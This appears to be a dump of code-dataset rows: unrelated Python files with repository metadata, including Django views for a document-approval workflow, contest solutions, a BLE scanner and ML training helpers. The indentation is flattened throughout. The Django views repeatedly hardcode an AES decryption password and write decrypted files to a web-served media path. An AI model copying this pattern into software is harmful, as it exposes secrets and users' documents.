taf=TAapplicationfiles.objects.filter(user_id=fc.user_id,filecategory='DAL_MDI',refid=fc.idprefix).first()
dalurl=''
if taf:
aesurl=taf.filepath
if taf.ext=='.pdf':
pdfurl = aesurl[:-4]
print('aesview',aesurl)
print('pdfview',pdfurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(pdfurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
pdfpath = pdfurl[25:]
print(pdfpath,'pppppppppp')
curr_path=pdfpath
dalurl='http://127.0.0.1:8000/media'+curr_path
print(dalurl,'pppp11111pppppp')
taf=TAapplicationfiles.objects.filter(user_id=fc.user_id,filecategory='BOM',refid=fc.idprefix).first()
bomurl=''
if taf:
aesurl=taf.filepath
if taf.ext=='.pdf':
pdfurl = aesurl[:-4]
print('aesview',aesurl)
print('pdfview',pdfurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(pdfurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
pdfpath = pdfurl[25:]
print(pdfpath,'pppppppppp')
curr_path=pdfpath
bomurl='http://127.0.0.1:8000/media'+curr_path
print(bomurl,'pppp11111pppppp')
taf=TAapplicationfiles.objects.filter(user_id=fc.user_id,filecategory='Tech_Spec',refid=fc.idprefix).first()
techspecurl=''
if taf:
aesurl=taf.filepath
if taf.ext=='.pdf':
pdfurl = aesurl[:-4]
print('aesview',aesurl)
print('pdfview',pdfurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(pdfurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
pdfpath = pdfurl[25:]
print(pdfpath,'pppppppppp')
curr_path=pdfpath
techspecurl='http://127.0.0.1:8000/media'+curr_path
print(techspecurl,'pppp11111pppppp')
context= {
'firmname':taa.firmname,
'addr1':taa.addr1,
'addr2':taa.addr2,
'item_name':taa.item_name,
'part_no':taa.part_no,
'desc':taa.desc,
'dal_mdi':taa.dal_mdi,
'bom':taa.bom,
'sop_acbs':taa.sop_acbs,
'pc': taa.pc,
'tre':taa.tre,
'otheritems':taa.otheritems,
'dalurl':dalurl,
'bomurl':bomurl,
'techspecurl':techspecurl,
'ta': pro.ta,
'techspec': pro.techspec,
'qts': pro.qts,
'qtr': pro.qtr,
'cd': pro.cd,
'photo': pro.photo,
'feedback': pro.feedback,
'req': pro.req,
'cost': pro.cost,
'quantity': pro.quantity,
'pc': pro.pc,
'tacomments':pro.tacomments,
'datenow':formatted_datetime
}
response = HttpResponse(content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename="report.pdf"'
html = template.render(context)
pisaStatus = pisa.CreatePDF(
html,dest=response,link_callback=link_callback)
if pisaStatus:
return HttpResponse(response,content_type='application/pdf')
# if error then show some funy view
if pisaStatus.err:
return HttpResponse('We had some errors <pre>' + html + '</pre>')
return response
else:
print(form.errors)
return render(request, 'dealing officer/proforma.html', {'form': form,'id':id,'idprefix':idprefix})
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer"])
def generateproformapdf(request):
id=request.POST['id']
idprefix=request.POST['idprefix']
print('saiiiiiiiiiiiiiii',id)
fc=TAapplicationmodel.objects.filter(user_id=id,idprefix=idprefix).first()
print(fc.idprefix,'kkk')
tafil=TAapplicationfiles.objects.filter(user_id=fc.user_id,filecategory="TAapplication",refid=fc.idprefix).first()
# return render(request, 'dealing officer/proforma.html')
if request.method=='POST':
# firstname=request.POST['firstname']
# lastname=request.POST['lastname']
# country=request.POST['country']
# subject=request.POST['subject']
# reg=get_object_or_404(registration,id=id)
user=User.objects.get(pk=fc.user_id)
form = proforma_A_form(request.POST,request=fc.user_id,idpre=fc.idprefix)
if form.is_valid():
pro= form.save(commit=False)
pro.user = user
pro.idprefix=fc.idprefix
pro.save()
taapp_form=TAapplicationmodel.objects.filter(user_id=pro.user_id,idprefix=fc.idprefix).first()
print("pro_form",taapp_form.id)
get_taap_id=statusmodel.objects.filter(TAA_id=taapp_form.id).first()
get_taap_id.status='Ready_for_CL'
get_taap_id.Ready_for_CL=datetime.now()
get_taap_id.save()
print("status",get_taap_id)
messages.success(request, 'Proforma_A Successfully Prepared !')
return render(request, 'dealing officer/proforma.html')
# print('firstname',request.POST['firmname'])
# firmname=request.POST['firmname']
# template = get_template('dealing officer/proformapdf.html')
# context= {
# 'desc':request.POST['desc'],
# 'item_name':request.POST['item_name'],
# 'part_no':request.POST['part_no'],
# 'dal_mdi':request.POST['dal_mdi'],
# 'bom':request.POST['bom'],
# 'sop_acbs':request.POST['sop_acbs'],
# 'otheritems':request.POST['otheritems'],
# 'firmname':request.POST['firmname'],
# 'addr1':request.POST['addr1'],
# 'addr2':request.POST['addr2'],
# 'ta': request.POST['ta'],
# 'techspec': request.POST['techspec'],
# 'qts': request.POST['qts'],
# 'qtr': request.POST['qtr'],
# 'cd': request.POST['cd'],
# 'tre': request.POST['tre'],
# 'photo': request.POST['photo'],
# 'feedback': request.POST['feedback'],
# 'req': request.POST['req'],
# 'cost': request.POST['cost'],
# 'quantity': request.POST['quantity'],
# 'pc': request.POST['pc'],
# 'tacomments':request.POST['tacomments']
# }
# response = HttpResponse(content_type='application/pdf')
# response['Content-Disposition'] = 'attachment; filename="report.pdf"'
# html = template.render(context)
# pisaStatus = pisa.CreatePDF(
# html, dest=response, link_callback=link_callback)
# if pisaStatus:
# return HttpResponse(response, content_type='application/pdf')
# # if error then show some funy view
# if pisaStatus.err:
# return HttpResponse('We had some errors <pre>' + html + '</pre>')
# return response
else:
print(form.errors)
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD"])
def rowselect(request,id):
form=commentsUploadForm
print('if',id)
idprefix=request.POST['idprefix']
print(idprefix,'idprefix')
taf=TAapplicationfiles.objects.filter(user_id=id,refid=idprefix).order_by('refpath').first()
get_refpath=TAapplicationfiles.objects.filter(user_id=id,refid=idprefix).values('refpath').order_by('refpath')
idg=idgenerationmodel.objects.filter(user_id=id,idprefix=idprefix).first()
print(get_refpath,'taff')
for anex_name in get_refpath:
anexture_name = anex_name['refpath']
print(anexture_name,'taff')
comments = commentsmodel(name=anexture_name,idprefix=idprefix,user_id=id)
commentsdb=comments.save()
Datadisp=commentsmodel.objects.filter(user_id=id,idprefix=idprefix).order_by('name')
print(Datadisp,'Datadisp')
# return render(request, 'applicant/view_all_doc.html',{'form':form,'details': taf,'idg':idg,'idprefix':idprefix})
# taa=TAapplicationmodel.objects.filter(user_id=id).first()
# taf=TAapplicationfiles.objects.filter(user_id=id).exclude(filecategory="TAapplication")
# return render(request, 'dealing officer/detail view.html',{'taa':taa,'taf':taf,'id':id})
return render(request, 'rd/comments_view_doc.html',{'form':form,'details': Datadisp})
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD"])
def addcomment(request):
anexture_name=request.POST['name']
comments=request.POST['comments']
responsible=request.POST['responsible']
status=request.POST['status']
idprefix=request.POST['idprefix']
print(idprefix,anexture_name,'idprefix')
print(comments,responsible,status,'details')
role=request.role
date_joined = datetime.now()
formatted_datetime = date_joined.strftime("%Y-%m-%d")
# get_cmd_id=commentsmodel.objects.filter(name=anexture_name,idprefix=idprefix).first()
# get_cmd_id.comments=comments
# get_cmd_id.commented_date=formatted_datetime
# get_cmd_id.commented_by=role
# get_cmd_id.save()
return render(request, 'rd/comments_view_doc.html')
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD"])
def pdfviewercopy(request,id):
# curr_path = "/"+str(id)+ "/TAapplication/"
# curr_path=curr_path.replace('/','\\')
# new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
# with open(new_path+'TAapplication.pdf', 'rb') as pdf:
# response = HttpResponse(pdf.read(),content_type='application/pdf')
# response['Content-Disposition'] = 'filename=some_file.pdf'
# return response
taa=TAapplicationmodel.objects.filter(user_id=id).first()
taf=TAapplicationfiles.objects.filter(user_id=id).exclude(filecategory="TAapplication")
print('kkkkkkkkkkkkkkkkk')
if request.POST:
aesurl=request.POST['path']
ext=request.POST['ext']
tafnew=TAapplicationfiles.objects.filter(user_id=id,filepath=aesurl,ext=ext).first()
fc=tafnew.comments
print('aesview',aesurl)
pdfurl=''
docurl=''
nameonly=''
if ext=='.pdf':
pdfurl = aesurl[:-3]+'pdf'
print('aesview',aesurl)
print('pdfview',pdfurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(pdfurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
print(pdfurl,'pdfurl')
pdfpath = pdfurl[25:]
print(pdfpath)
curr_path=pdfpath
url='http://127.0.0.1:8000/media'+curr_path
print(fc,'comments')
return render(request, 'dealing officer/detail view.html',{'url':url,'id':id,'fc':fc,'taa':taa,'taf':taf,'path':aesurl})
elif ext=='docx':
# word to pdf
nameonly=aesurl[:-4]
docurl = aesurl[:-4]+'.docx'
print('aesview',aesurl)
print('nameonly',nameonly)
print('docurl',docurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(docurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
pythoncom.CoInitialize()
wdFormatPDF = 17
in_file = os.path.abspath(docurl)
word = comtypes.client.CreateObject('Word.Application')
doc = word.Documents.Open(in_file)
doc.SaveAs(nameonly+'.pdf', FileFormat=wdFormatPDF)
doc.Close()
word.Quit()
pdfurl=nameonly+'.pdf'
print(pdfurl,'pdfurl')
pdfpath = pdfurl[25:]
print(pdfpath)
curr_path=pdfpath
url='http://127.0.0.1:8000/media'+curr_path
print(fc,'comments')
os.remove(docurl)
return render(request, 'dealing officer/detail view.html',{'url':url,'id':id,'fc':fc,'taa':taa,'taf':taf,'path':aesurl})
# with open(nameonly+'.pdf', 'rb') as pdf:
# response = HttpResponse(pdf.read(),content_type='application/pdf')
# response['Content-Disposition'] = 'filename=some_file.pdf'
# return response
# finally:
# os.remove(nameonly+'.pdf')
# os.remove(docurl)
else:
return render(request, 'dealing officer/detail view.html',{'id':id,'taa':taa,'taf':taf})
# os.remove(pdfurl)
# print('asdfasdfasdfasdfasdfds')
| [
"[email protected]"
] | |
b03de72493e2c78c1000ad28f82b270dba2b5ebb | f13acd0d707ea9ab0d2f2f010717b35adcee142f | /Others/soundhound/soundhound2018-summer-qual/c.py | b42363ae9f79c07d25224a6872610f1bc11e50c0 | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | KATO-Hiro/AtCoder | 126b9fe89fa3a7cffcbd1c29d42394e7d02fa7c7 | bf43320bc1af606bfbd23c610b3432cddd1806b9 | refs/heads/master | 2023-08-18T20:06:42.876863 | 2023-08-17T23:45:21 | 2023-08-17T23:45:21 | 121,067,516 | 4 | 0 | CC0-1.0 | 2023-09-14T21:59:38 | 2018-02-11T00:32:45 | Python | UTF-8 | Python | false | false | 797 | py | # -*- coding: utf-8 -*-
def main():
n, m, d = map(int, input().split())
    # Key insight:
    # Linearity of expectation.
    # See:
    # https://img.atcoder.jp/soundhound2018-summer-qual/editorial.pdf
    # https://mathtrain.jp/expectation
    # What helped:
    # Writing out the brute-force solution.
    # There are m - 1 adjacent pairs of terms.
    # Gap to the solution:
    # Split into cases on whether d is 0.
    # Think in terms of pairs of integers.
ans = m - 1
if d == 0:
        # d = 0: the n pairs (1, 1), ..., (n, n)
ans /= n
else:
        # d != 0: (1, d + 1), ..., (n - d, n) and (d + 1, 1), ..., (n, n - d), i.e. 2 * (n - d) pairs
ans *= 2 * (n - d)
ans /= n ** 2
print(ans)
if __name__ == '__main__':
main()
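# Worked example (sketch): with n=3, m=2, d=1 the d != 0 branch computes
# (m - 1) * 2 * (n - d) / n**2 = 1 * 2 * 2 / 9 = 4/9 ~= 0.4444.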
| [
"[email protected]"
] | |
579b09ba8c6ea43f5b254fc7bfcff355538a029b | aa369073fab4f8e13ac27a714fe0d975a5a4a9ed | /algorithms/contextlib/contextlib_decorator.py | e31081404750566ee6b97aecadeb90d4fa43ebe0 | [] | no_license | ramsayleung/python3-module-of-week | 4076599a8b1d8aa5794de5d73e2083555abe9f0c | 54266c7e62025c3816a6987191c40f3bc0fdd97c | refs/heads/master | 2021-06-18T09:07:30.256614 | 2017-06-25T10:14:54 | 2017-06-25T10:14:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 583 | py | import contextlib
class Context(contextlib.ContextDecorator):
def __init__(self, how_used):
self.how_used = how_used
print('__init__({})'.format(how_used))
def __enter__(self):
print('__enter__({})'.format(self.how_used))
return self
def __exit__(self, exc_type, exc_val, exc_tb):
print('__exit__({})'.format(self.how_used))
@Context('as decorator')
def func(message):
print(message)
print()
with Context('as context manager'):
print('Doing work in the context')
print()
func('Doing work in the wrapped function')
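# Expected output (a sketch, following ContextDecorator semantics: __init__
# runs when the decorator/instance is created, while __enter__/__exit__ run
# around each use):
#   __init__(as decorator)
#
#   __init__(as context manager)
#   __enter__(as context manager)
#   Doing work in the context
#   __exit__(as context manager)
#
#   __enter__(as decorator)
#   Doing work in the wrapped function
#   __exit__(as decorator)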
| [
"[email protected]"
] | |
234dd1f7bc842aa839543c69dc1229e4cbfc4ef0 | 299e2c985b4a2921b150579955e7c60eee094397 | /news/migrations/0006_auto_20190628_1447.py | 9bd54a81c13dcf49ebf7819d2ee21928410fb2e4 | [
"MIT"
] | permissive | Nigar-mr/News | 48d58fbaab0f2bb8cc717323449d7eba14b94918 | b75b78cc9fa64259f4239b1d456daa5224040ce4 | refs/heads/master | 2020-06-17T15:20:05.411391 | 2019-07-09T08:21:24 | 2019-07-09T08:21:24 | 195,961,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 407 | py | # Generated by Django 2.2.2 on 2019-06-28 10:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('news', '0005_remove_headermodel_dropdown'),
]
operations = [
migrations.AlterField(
model_name='headermodel',
name='image',
field=models.ImageField(upload_to='news/icons/'),
),
]
| [
"[email protected]"
] | |
4be510286a64309365e96715a1c1baddce168127 | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/comp/accessp.py | 6214ab713e8f774ee7c5499f70f913487eac8f0d | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 5,062 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class AccessP(Mo):
meta = ClassMeta("cobra.model.comp.AccessP")
meta.isAbstract = True
meta.moClassName = "compAccessP"
meta.moClassName = "compAccessP"
meta.rnFormat = ""
meta.category = MoCategory.REGULAR
meta.label = "Abstraction of Access Profile"
meta.writeAccessMask = 0x11
meta.readAccessMask = 0x11
meta.isDomainable = False
meta.isReadOnly = False
meta.isConfigurable = True
meta.isDeletable = True
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.parentClasses.add("cobra.model.vmm.DomP")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.pol.Def")
meta.concreteSubClasses.add("cobra.model.vmm.UsrAccP")
meta.rnPrefixes = [
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5579, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerKey", prop)
prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerTag", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
# Deployment Meta
meta.deploymentQuery = True
meta.deploymentType = "Ancestor"
meta.deploymentQueryPaths.append(DeploymentPathMeta("DomainToVmmOrchsProvPlan", "Provider Plans", "cobra.model.vmm.OrchsProvPlan"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("ADomPToEthIf", "Interface", "cobra.model.l1.EthIf"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("DomainToVirtualMachines", "Virtual Machines", "cobra.model.comp.Vm"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("DomainToVmmEpPD", "Portgroups", "cobra.model.vmm.EpPD"))
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
9e03554339fbf11a977d749579273a5308ebe17c | 0ba1743e9f865a023f72a14d3a5c16b99ee7f138 | /problems/test_0413_dp.py | b94b4a4005613d47a4b97b5eda809a2ed0f42f15 | [
"Unlicense"
] | permissive | chrisxue815/leetcode_python | d0a38a4168243b0628256825581a6df1b673855c | a33eb7b833f6998972e5340d383443f3a2ee64e3 | refs/heads/main | 2022-06-20T15:09:27.221807 | 2022-06-02T21:55:35 | 2022-06-02T21:55:35 | 94,590,264 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 997 | py | import unittest
import utils
# O(n^2) time. O(n) space. DP.
class Solution:
def numberOfArithmeticSlices(self, a):
"""
:type a: List[int]
:rtype: int
"""
# Common difference
dp = [0] * len(a)
result = 0
for p in range(len(a) - 1):
q = p + 1
dp[p] = a[q] - a[p]
for distance in range(2, len(a)):
for p in range(len(a) - distance):
q = p + distance
if dp[p] == a[q] - a[q - 1]:
result += 1
else:
dp[p] = None
return result
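# Worked example (sketch): a = [1, 2, 3, 4] contains the arithmetic slices
# [1,2,3], [2,3,4] and [1,2,3,4], so numberOfArithmeticSlices returns 3.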
class Test(unittest.TestCase):
def test(self):
cases = utils.load_test_json(__file__).test_cases
for case in cases:
args = str(case.args)
actual = Solution().numberOfArithmeticSlices(**case.args.__dict__)
self.assertEqual(case.expected, actual, msg=args)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
15779835a64dfa759bd9410bf9661ec5cf78f3aa | 9a1538123b8abec14410dad46c437cf735684dd9 | /product/migrations/0018_productproperty_value_type.py | 48a0a691e24e11ea5cedf4a2158c7c000f223fd6 | [] | no_license | asmuratbek/zastroy24 | deec6bd65229aeb29eb313d915c6c47ca036a8aa | d68ce21beefc644752a1271a4d8981cd2423afba | refs/heads/master | 2020-04-27T18:44:26.845151 | 2019-03-08T18:09:13 | 2019-03-08T18:09:13 | 174,585,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-12-24 09:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('product', '0017_auto_20171224_1536'),
]
operations = [
migrations.AddField(
model_name='productproperty',
name='value_type',
field=models.CharField(help_text='\u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043a\u0433', max_length=255, null=True, verbose_name='\u0415\u0434\u0438\u043d\u0438\u0446\u0430 \u0438\u0437\u043c\u0435\u0440\u0435\u043d\u0438\u044f'),
),
]
| [
"[email protected]"
] | |
7ea4348e0388b427adcc0d1d2c31b06df0550e19 | 023acc1445ebde3e9fe4318fcfd60908c91d74d5 | /sli/train.py | 77fdce51b077a71a4dc73a1c298f924c963fc9d0 | [] | no_license | counterfactuals/sensible-local-interpretations | 99d22df59a6f07b6135762eec57c29e80dac9cdf | ab7af07299ea2ec1a1be28e0bf38f4947321d04c | refs/heads/master | 2022-03-12T11:30:19.296104 | 2019-12-02T20:31:27 | 2019-12-02T20:31:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,828 | py | from copy import deepcopy
import numpy as np
from sklearn.neural_network import MLPClassifier, MLPRegressor
from sklearn.linear_model import LogisticRegression, LinearRegression
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor, GradientBoostingClassifier, GradientBoostingRegressor
from sklearn.tree import export_graphviz, DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.tree import plot_tree
from sampling import resample
def train_models(X: np.ndarray, y: np.ndarray,
class_weights: list=[0.5, 1.0, 2.0], model_type: str='logistic'):
'''
Params
------
class_weights
Weights to weight the positive class, one for each model to be trained
'''
assert np.unique(y).size == 2, 'Task must be binary classification!'
models = []
for class_weight in class_weights:
if model_type == 'logistic':
m = LogisticRegression(solver='lbfgs', class_weight={0: 1, 1: class_weight})
elif model_type == 'mlp2':
m = MLPClassifier()
X, y = resample(X, y, sample_type='over', class_weight=class_weight)
elif model_type == 'rf':
m = RandomForestClassifier(class_weight={0: 1, 1: class_weight})
elif model_type == 'gb':
m = GradientBoostingClassifier()
X, y = resample(X, y, sample_type='over', class_weight=class_weight)
m.fit(X, y)
models.append(deepcopy(m))
return models
def regress(X: np.ndarray, y: np.ndarray, model_type: str='linear'):
if model_type == 'linear':
m = LinearRegression()
elif model_type == 'mlp2':
m = MLPRegressor()
elif model_type == 'rf':
m = RandomForestRegressor()
elif model_type == 'gb':
m = GradientBoostingRegressor()
m.fit(X, y)
return m
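# Example usage (a sketch with synthetic data; not part of the original module):
# X = np.random.randn(200, 5)
# y = (X[:, 0] > 0).astype(int)
# models = train_models(X, y, class_weights=[0.5, 1.0, 2.0], model_type='logistic')
# reg = regress(X, X[:, 1], model_type='linear')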
| [
"[email protected]"
] | |
cc2b9367dcb75a3613b7456a24d7379ffed94e1f | 23daf97312ea16cc399feedfa048131d564b83fa | /lib/BluenetLib/lib/core/bluetooth_delegates/AioScanner.py | 1bdc096e712664a077ca209d4d5155cfeaf19041 | [] | no_license | wickyb94/programmer | 6e2cafa3fbb9f54bfdcd24f7062f6425ebb429fc | be0f01586365a79b51af8c4da376fe216d38afba | refs/heads/master | 2022-04-09T17:52:18.106331 | 2020-03-02T15:57:02 | 2020-03-02T15:57:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,569 | py | import asyncio
import sys
import time
import aioblescan
from BluenetLib.lib.util.LogUtil import tfs
counter = 0
prev = time.time()
start = time.time()
class AioScanner:
def __init__(self, hciIndex = 0):
self.event_loop = None
self.bluetoothControl = None
self.connection = None
self.timeRequestStart = 0
self.eventReceived = False
self.hciIndex = hciIndex
self.delegate = None
self.scanRunning = False
self.scanDuration = 0
def withDelegate(self, delegate):
self.delegate = delegate
return self
def start(self, duration):
self.scanRunning = True
self.scanDuration = duration
self.scan()
def stop(self):
self.scanRunning = False
def scan(self, attempt = 0):
print(tfs(), "Attempt Scanning")
self.eventReceived = False
event_loop = asyncio.new_event_loop()
bluetoothSocket = aioblescan.create_bt_socket(self.hciIndex)
transportProcess = event_loop._create_connection_transport(bluetoothSocket, aioblescan.BLEScanRequester, None, None)
self.connection, self.bluetoothControl = event_loop.run_until_complete(transportProcess)
print(tfs(), "Connection made!")
self.bluetoothControl.process = self.parsingProcess
self.timeRequestStart = time.time()
self.bluetoothControl.send_scan_request()
print(tfs(), "Scan command sent!")
alreadyCleanedUp = False
try:
event_loop.run_until_complete(self.awaitEventSleep(1))
if not self.eventReceived:
if attempt < 10:
print(tfs(), 'Retrying... Closing event loop', attempt)
self.cleanup(event_loop)
alreadyCleanedUp = True
self.scan(attempt + 1)
return
else:
pass
event_loop.run_until_complete(self.awaitActiveSleep(self.scanDuration))
except KeyboardInterrupt:
print('keyboard interrupt')
finally:
print("")
if not alreadyCleanedUp:
print(tfs(), 'closing event loop', attempt)
self.cleanup(event_loop)
async def awaitEventSleep(self, duration):
while self.eventReceived == False and duration > 0:
await asyncio.sleep(0.05)
duration -= 0.05
async def awaitActiveSleep(self, duration):
while self.scanRunning == True and duration > 0:
await asyncio.sleep(0.05)
duration -= 0.05
def cleanup(self, event_loop):
print(tfs(), "Cleaning up")
self.bluetoothControl.stop_scan_request()
self.connection.close()
event_loop.close()
def parsingProcess(self, data):
ev=aioblescan.HCI_Event()
xx=ev.decode(data)
hasAdvertisement = self.dataParser(ev)
if hasAdvertisement and self.delegate is not None:
self.delegate.handleDiscovery(ev)
def dataParser(self, data):
#parse Data required for the scanner
advertisementReceived = False
for d in data.payload:
if isinstance(d, aioblescan.aioblescan.HCI_CC_Event):
self.checkHCI_CC_EVENT(d)
elif isinstance(d, aioblescan.Adv_Data):
advertisementReceived = self.dataParser(d) or advertisementReceived
elif isinstance(d, aioblescan.HCI_LE_Meta_Event):
advertisementReceived = self.dataParser(d) or advertisementReceived
elif isinstance(d, aioblescan.aioblescan.HCI_LEM_Adv_Report):
self.eventReceived = True
advertisementReceived = True
return advertisementReceived
def checkHCI_CC_EVENT(self, event):
for d in event.payload:
if isinstance(d, aioblescan.aioblescan.OgfOcf):
if d.ocf == b'\x0b':
print(tfs(),"Settings received")
elif d.ocf == b'\x0c':
print(tfs(), "Scan command received")
# if isinstance(d, aioblescan.aioblescan.Itself):
# print("byte", d.name)
# if isinstance(d, aioblescan.aioblescan.UIntByte):
# print("UIntByte", d.val)
def parseAdvertisement(self, decodedHciEvent):
global counter
if counter % 50 == 0:
counter = 0
print(".")
else:
sys.stdout.write(".")
counter+= 1
# decodedHciEvent.show()
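# Example usage (a sketch; MyDelegate is hypothetical and must provide the
# handleDiscovery(event) method that parsingProcess calls above):
# scanner = AioScanner(hciIndex=0).withDelegate(MyDelegate())
# scanner.start(duration=30)  # scan for roughly 30 seconds
# scanner.stop()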
| [
"[email protected]"
] | |
